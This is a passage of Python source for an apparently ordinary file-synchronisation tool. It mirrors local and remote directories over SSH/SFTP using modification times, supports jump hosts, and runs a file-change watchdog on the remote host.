return path.split(self.path)[1]
@abc.abstractmethod
def check_connection(self):
return True
async def _empty(self):
return None
def write(self, origin, target_holder, write_cb=None):
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
# Ignore some files (this is a good place as is implementation independent)
if target_path.endswith(IGNORED_PATTERNS) or self.has_ignore(target_path, target_holder.path):
log.debug(f'Ignored file {origin}')
return self._empty()
if not self.has_pattern(target_path, target_holder.path):
return self._empty()
if origin.change_type in [None, 'C', 'M']:
return self._write(origin, target_holder, write_cb)
else:
return self._delete(origin, target_holder, write_cb)
async def _delete(self, origin, target_holder, callback=None):
""" Delete file """
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
target = None
try:
target = await target_holder.get_file(target_path)
except FileNotFoundError:
return True
merged = False
if origin.time > target.time:
log.debug(f'Calling delete on {target_path}')
if not self.dry:
await target_holder._deletefile(target_path)
merged = True
if callback is not None:
callback(merged=merged, change='D')
return merged
async def _write(self, origin, target_holder, callback=None):
""" Overwrite target with origin if newer """
# Find correct path for target file
target_path = os.path.join(target_holder.path, origin.holder.relative_path(origin.path))
force = False
target = None
try:
target = await target_holder.get_file(target_path)
except FileNotFoundError:
force = True
# Watchdog return File instance with no time, we fetch it now
try:
if origin.time is None:
origin.time = await origin.fetch_time()
except FileNotFoundError:
return False
merged = False
if force or origin.time > target.time:
origin_content = await origin.get_content()
if origin_content is None:
return False
log.debug(f'Calling write on {target_path}')
if not self.dry:
await target_holder._writefile(origin_content, target_path, mtime=origin.time)
merged = True
if callback is not None:
callback(merged=merged, change='M')
return merged
def next_task(self, n=100):
if self.tasks is None:
return None
res = []
try:
for i in range(n):
res.append(self.tasks.get_nowait())
except Empty:
return res
@abc.abstractmethod
async def _writefile(self, origin, target, mtime):
raise NotImplementedError
@abc.abstractmethod
async def _deletefile(self, target):
raise NotImplementedError
@abc.abstractmethod
def all_files(self):
raise NotImplementedError
@abc.abstractmethod
async def get_content(self, path):
raise NotImplementedError
@abc.abstractmethod
async def get_file(self, path):
raise NotImplementedError
@abc.abstractmethod
async def get_time(self, path):
raise NotImplementedError
@abc.abstractmethod
def start_watchdog(self):
"""
This should start the watchdog process on the host
"""
raise NotImplementedError
@abc.abstractmethod
def cleanup(self):
pass
class RemotePath(Path):
def __init__(self, path, host, dry=False, pattern='*', ignore_pattern='//', key='~/.ssh/id_rsa', jump_host=None, *args, **kwargs):
super().__init__(path, dry, pattern, ignore_pattern, *args, **kwargs)
# Setup configs for connection
user = os.getlogin()
self.port = 22 # Default port
if '@' in host:
user, _, host = host.partition('@')
if ':' in host:
host, _, port = host.partition(':')
self.port = int(port)
self.host = host
self.user = user
# Jumping connection
self.jump = jump_host is not None
jump_user = os.getlogin()
self.jump_port = 22
if jump_host is not None:
if '@' in jump_host:
jump_user, _, jump_host = jump_host.partition('@')
if ':' in jump_host:
jump_host, _, jump_port = jump_host.partition(':')
self.jump_port = int(port)
self.jump_host = jump_host
self.jump_user = jump_user
self.password = None
try:
self.key = RemotePath.load_agent_keys()
except ValueError:
try:
self.key = RemotePath.import_private_key(key)
except FileNotFoundError:
self.key = None
self.password = getpass.getpass('No valid key found, specify a password for auth: ')
self._conn = None
self._sftp = None
self._last_check = 0
self.open_sem = asyncio.Semaphore(128) # Max open files?
self.req = set()
@property
def conn(self):
if self._conn is None:
return self.ssh_connect()
return self._conn
@property
def sftp(self):
if self._sftp is None:
return self.sftp_connect()
return self._sftp
async def sftp_connect(self): # This is awaited on check connection
self._sftp = await self.conn.start_sftp_client(env={'block_size': 32768})
return self._sftp
# def connection_lost(self, exc):
# print('*** CONNECTION LOST ***')
async def ssh_connect(self):
options = asyncssh.SSHClientConnectionOptions(client_keys=self.key if self.key is not None else None,
password=self.password if self.key is None else None
)
if self.jump:
self._tunnel = await asyncssh.connect(self.jump_host, port=self.jump_port, username=self.jump_user, options=options)
self._conn = await self._tunnel.connect_ssh(self.host, port=self.port, username=self.user, options=options)
else:
self._conn = await asyncssh.connect(self.host, port=self.port, username=self.user, options=options)
# self._conn.connection_lost = self.connection_lost
return self._conn
def load_agent_keys(agent_path=None):
"""
The ssh-agent is a convenience tool that aims at easying the use of
private keys protected with a password. In a nutshell, the agent runs on
your local computer, and you trust it enough to load one or several keys
into the agent once and for good - and you provide the password
at that time.
Later on, each time an ssh connection needs to access a key,
the agent can act as a proxy for you and pass the key along
to the ssh client without the need for you to enter the password.
The ``load_agent_keys`` function allows your python code to access
the keys currently knwns to the agent. It is automatically called by the
:class:`~apssh.nodes.SshNode` class if you do not explicit the set of
keys that you plan to use.
Parameters:
agent_path: how to locate the agent;
defaults to env. variable $SSH_AUTH_SOCK
Returns:
a list of SSHKey_ keys from the agent
.. note::
Use the command ``ssh-add -l`` to inspect the set of keys
currently present in your agent.
"""
# pylint: disable=c0111
async def co_load_agent_keys(agent_path):
# make sure to return an empty list when something goes wrong
try:
agent_client = asyncssh.SSHAgentClient(agent_path)
keys = await agent_client.get_keys()
agent_client.close()
return keys
except ValueError as exc:
# not quite sure which exceptions to expect here
log.error(f"When fetching agent keys: "
f"ignored exception {type(exc)} - {exc}")
return []
agent_path = agent_path or os.environ.get('SSH_AUTH_SOCK', None)
if agent_path is None:
return []
loop = asyncio.get_event_loop()
return loop.run_until_complete(co_load_agent_keys(agent_path))
def import_private_key(filename):
"""
Attempts to import a private key from file
Prompts for a password if needed
"""
sshkey = None
basename = os.path.basename(filename)
filename = os.path.expanduser(filename)
if not os.path.exists(filename):
log.error("No such key file {}".format(filename))
raise FileNotFoundError
with open(filename) as file:
data = file.read()
try:
sshkey = asyncssh.import_private_key(data)
except asyncssh.KeyImportError:
while True:
passphrase = getpass.getpass("Enter passphrase for key {} : ".format(basename))
if not passphrase:
log.info("Ignoring key {}".format(filename))
break
try:
sshkey = asyncssh.import_private_key(data, passphrase)
break
except asyncssh.KeyImportError:
log.error("Wrong passphrase")
return sshkey
def check_connection(self):
return run(self._check_connection())
async def _check_connection(self):
if time.time() - self._last_check < 30:
return True
self._last_check = time.time()
if self._conn is None:
await self.conn # This will initialize the connections
await self.sftp
try: # Check connection to remote host
# Check path is valid
if await self.sftp.isdir(self.path):
return True
return False
except TimeoutError:
return False
def all_files(self):
res = run(self._files_path()) # This returns all files in default path
if not isinstance(res, list):
return [res]
return res
async def _recursive_scan(self, path, files):
if await self.sftp.isfile(path):
return [[(await self.sftp.stat(path)).mtime, path]]
tasks = set()
async for f in self.sftp.scandir(path):
if f.filename in ('.', '..'): # Ignore reference to self and parent
continue
if stat.S_ISLNK(f.attrs.permissions): # Ignore symbolic links
continue
remotepath = os.path.join(path, f.filename)
if not self.has_pattern(remotepath, self.path) or self.has_ignore(remotepath, self.path):
continue
if stat.S_ISDIR(f.attrs.permissions):
tasks.add(asyncio.create_task(self._recursive_scan(remotepath, files)))
else:
files.append([f.attrs.mtime, remotepath])
if tasks:
await asyncio.gather(*tasks)
return files
async def _files_path(self, path=None):
path = self.path if path is None else path
files = await self._recursive_scan(path, [])
files = [File(path, time, self) for time, path in files]
return files[0] if len(files) == 1 else files
async def get_content(self, path):
fd = BytesIO()
try:
async with self.open_sem:
async with self.sftp.open(path, 'rb') as src:
data = await src.read()
fd.write(data)
except asyncssh.SFTPNoSuchFile:
return None
return fd.getvalue()
async def get_time(self, path):
return (await self.get_file(path)).time
async def get_file(self, path):
try:
return await self._files_path(path)
except (asyncssh.ProcessError, asyncssh.SFTPNoSuchFile):
raise FileNotFoundError
async def _writefile(self, origin, target, mtime):
path = self.sftp.encode(os.path.dirname(target))
curpath = b'/' if posixpath.isabs(path) else (self.sftp._cwd or b'')
for part in path.split(b'/'):
curpath = posixpath.join(curpath, part)
try:
await self.sftp.mkdir(curpath, asyncssh.SFTPAttrs())
except asyncssh.SFTPFailure:
mode = await self.sftp._mode(curpath)
if not stat.S_ISDIR(mode):
path = curpath.decode('utf-8', errors='replace')
raise asyncssh.SFTPFailure(f'{path} is not a directory') from None
data = BytesIO(origin).read()
async with self.open_sem:
attrs = asyncssh.SFTPAttrs(atime=mtime.timestamp(), mtime=mtime.timestamp())
async with self.sftp.open(target, 'wb', attrs) as dst:
await dst.write(data)
await dst.utime(times=(mtime.timestamp(), mtime.timestamp()))
async def _deletefile(self, target):
try:
await self.sftp.remove(target)
except (asyncssh.ProcessError, asyncssh.SFTPNoSuchFile):
pass
def start_watchdog(self):
assert self.tasks is None, 'Already initialized the watchdog'
self.tasks = Queue(maxsize=-1)
import src.watchdog_service
src_path = os.path.abspath(src.watchdog_service.__file__)
async def upload_watchdog():
await self.sftp.put(src_path, '/tmp/iris_wd.py')
log.debug('Running remote wd')
run(upload_watchdog())
self.wd = RemoteWDThread(self)
self.wd.start()
while self.wd.process is None:
time.sleep(1e-2)
def cleanup(self):
if self.wd is None:
return
self.wd.process.terminate()
def next_task(self):
# Be sure the connection does not drop here
self.check_connection()
return super().next_task()
class RemoteWDThread(Thread):
def __init__(self, holder):
Thread.__init__(self)
# Setup remote connection
self.path = holder.path
self.user = holder.user
self.host = holder.host
self.port = holder.port
# Setup jump connection
self.jump = holder.jump
self.jump_user = holder.jump_user
self.jump_host = holder.jump_host
self.jump_port = holder.jump_port
# Authentication
self.key = holder.key
self.password = holder.password
# WD setup
self.tasks = holder.tasks
self.holder = holder
self.pattern = holder.pattern
self.ignore_pattern = holder.ignore_pattern
self.process = None
def run(self):
loop = asyncio.new_event_loop()
async def async_wd():
options = asyncssh.SSHClientConnectionOptions(client_keys=self.key if self.key is not None else None,
password=self.password if self.key is None else None
)
provider = asyncssh.connect
if self.jump:
self._tunnel = await asyncssh.connect(self.jump_host,
port=self.jump_port, username=self.jump_user,
options=options)
provider = self._tunnel.connect_ssh
async with provider(self.host, port=self.port,
keepalive_interval=60, keepalive_count_max=9,
options=options) as conn:
async with conn.create_process('python3 -u /tmp/iris_wd.py',
input='\n'.join([self.path, self.pattern, self.ignore_pattern]),
stderr=asyncssh.STDOUT) as process:
self.process = process
line = False
while True:
try:
line = (await process.stdout.readline()).split('%')
path, isdir, change, mtime = line
log.debug(f'Remote WD event: {path} {isdir} {change} {mtime}')
if change != 'D':
mtime = None
self.tasks.put(File(path, mtime, self.holder, change))
except Exception as e:
# TODO: Probably here the conn and tunnel should be closed?
while line:
log.debug(line)
log.debug(e)
line = await process.stdout.readline()
break
loop.run_until_complete(async_wd())
loop.close()
class LocalPath(Path):
def __init__(self, path, dry=False, pattern='*', ignore_pattern='//', *args, **kwargs):
super().__init__(os.path.expanduser(path), dry, pattern, ignore_pattern, *args, **kwargs)
self.host = 'local'
self.open_sem = asyncio.Semaphore(128) # Max open files?
def check_connection(self):
if os.path.isdir(self.path):
return True
return False
def all_files(self):
files = []
for root, _, fs in os.walk(self.path):
for name in fs:
path = os.path.join(root, name)
if os.path.islink(path): # Ignore sys links
continue
if not self.has_pattern(path, self.path) or self.has_ignore(path, self.path):
continue
time = pathlib.Path(path).stat().st_mtime
files.append(File(path, time, self))
return files
async def get_content(self, path):
async with self.open_sem:
async with async_open(path, 'rb') as f:
return await f.read()
async def get_file(self, path):
return File(path, pathlib.Path(path).stat().st_mtime, self)
async def get_time(self, path):
return (await self.get_file(path)).time
async def _writefile(self, origin, target, mtime):
os.makedirs(os.path.dirname(target), exist_ok=True)
async with self.open_sem:
async with async_open(target, 'wb') as f:
await f.write(origin)
os.utime(target, (mtime.timestamp(), mtime.timestamp()))
async def _deletefile(self, target):
try:
os.remove(target)
except FileNotFoundError:
pass
def _wd(path, self, q):
from src.watchdog_service import run_wd
run_wd(path, queue=q, log=True, pattern=self.pattern, ignore_pattern=self.ignore_pattern)
while True:
path, isdir, change, mtime = q.get().split('%')
log.debug(f'Local WD event: {path} {isdir} {change} {mtime}')
if change != 'D':
mtime = None
self.tasks.put(File(os.path.relpath(path), mtime, self, change)) # TODO: This works but is not abs, why?
def start_watchdog(self):
assert self.tasks is None, 'Already initialized the watchdog'
self.tasks = Queue(maxsize=-1)
self.wd = Thread(target=LocalPath._wd, args=(os.path.abspath(self.path), self, Queue(maxsize=-1)))
self.wd.daemon = True
self.wd.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.